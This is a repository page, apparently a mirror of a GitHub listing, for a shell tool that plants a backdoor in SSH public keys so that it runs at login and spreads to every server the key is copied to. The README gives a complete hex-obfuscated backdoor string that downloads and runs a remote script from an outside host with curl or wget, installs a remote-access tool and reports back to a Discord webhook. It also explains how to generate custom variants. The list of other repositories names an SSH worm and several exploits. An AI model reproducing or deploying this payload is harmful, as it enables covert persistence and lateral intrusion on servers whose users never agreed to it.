• Stars
    star
    328
  • Rank 128,352 (Top 3 %)
  • Language
    Shell
  • Created over 1 year ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

ssh-key-backdoor

This program generates a backdoor to hide inside an SSH public key (e.g. id_rsa.pub or authorized_keys). The backdoor will execute once when the user next logs in.


The objective is to use the ssh public key to move laterally within a target network. It exploits the fact that users copy their public ssh key to other servers without checking the content. Any server where their public key is copied will automatically get backdoored.


See https://blog.thc.org/infecting-ssh-public-keys-with-backdoors for details

Simply add the following backdoor-string to the beginning of the public key (id_rsa.pub or authorized_keys; up until, but not including, the ssh-ed255191 AAA...)

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....

This DEMO backdoor-string installs https://www.gsocket.io/deploy and reports the success back to our Discord channel.

Think of the ssh public key as a sort of ~/.bashrc but with your backdoor inside, that gets propagaded by the user to various servers, and when triggered sends a secret login code back to us.

Create your own backdoor-string by editing ssh-key-backdoor.sh (between ---BEGIN BACKDOOR--- and ---END BACKDOOR---) and execute:

# Set your own discord key or the results will be reported to our Discord channel. Please.
$ export KEY="1246565073951234567/mEDRabcdefghijklnopqrstuvwxzyABCDEahagasdKr7YQmA0Ej1-Ibdaytta_XGGq-n"
$ ./ssh-key-backdoor.sh

# Or view the clear commands without hex-encoding
$ ./ssh-key-backdoor.sh clear

(The same command=-trick can be used to trigger a canary or start other hidden services.)


This goes deep down the Bash rabbit hole...the curious reader may like to read our blog.

More Repositories

1

thc-tips-tricks-hacks-cheat-sheet

Various tips & tricks
Shell
3,129
star
2

gsocket

Connect like there is no firewall. Securely.
C
1,504
star
3

THC-Archive

All releases of the security research group (a.k.a. hackers) The Hacker's Choice
HTML
685
star
4

thc-tesla-powerwall2-hack

TESLA PowerWall 2 Security Shenanigans
457
star
5

segfault

Shell
356
star
6

hackshell

Make BASH stealthy and hacker friendly with lots of bash functions
Shell
187
star
7

bpfhacks

eBPF hacks
171
star
8

zapper

Zaps arguments and environment from the process list
C
166
star
9

CVE-2021-26855

PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github
Python
61
star
10

ttyinject

Get root via TTY / TIOCSTI stuffing
C
61
star
11

thc-btc-rng-bruteforce

C
49
star
12

memexec

Circumventing "noexec" mount flag to execute arbitrary linux binaries by ptrace-less process injection
Assembly
47
star
13

ssh-it

Self replicating and automatically spreading SSH worm that recovers login credentials
C
41
star
14

erfs

Shell
37
star
15

thc-arpmitm

ARP Man-in-the-Middle tool
C
27
star
16

thc-rut

THC "R U There" network discovery tool
Objective-C
26
star
17

gsocket-relay

Global Socket Server
C
24
star
18

gs-transfer

Secure File Transfer via Global Socket Bounce Network
C
24
star
19

dsniff

C
24
star
20

docker-thc-hacker

Docker environment for hackers
Shell
14
star
21

iran-ssh-proxy

Docker Server Side for the Iran Proxy
Shell
13
star
22

binary

Binary and Static Releases
13
star
23

hackerschoice.github.io

The Hacker's Choice
13
star
24

kb

The Hacker's Choice Knowledge Base & Articles
11
star
25

cryptostorm

CrytptoStorm.is WireGuard docker container
Shell
7
star
26

docker-erfs-server

Shell
7
star
27

thc-art

Artistic work by THC
6
star
28

gsocket.io

Web pages for gsocket.io
5
star
29

mail

A Free Mail Forwarding Service
Perl
3
star
30

dnsgw

Go
3
star
31

thc-freezer-monitor

Raspberry Pi + MQTT + ThingSpeak + IFTTT
Python
1
star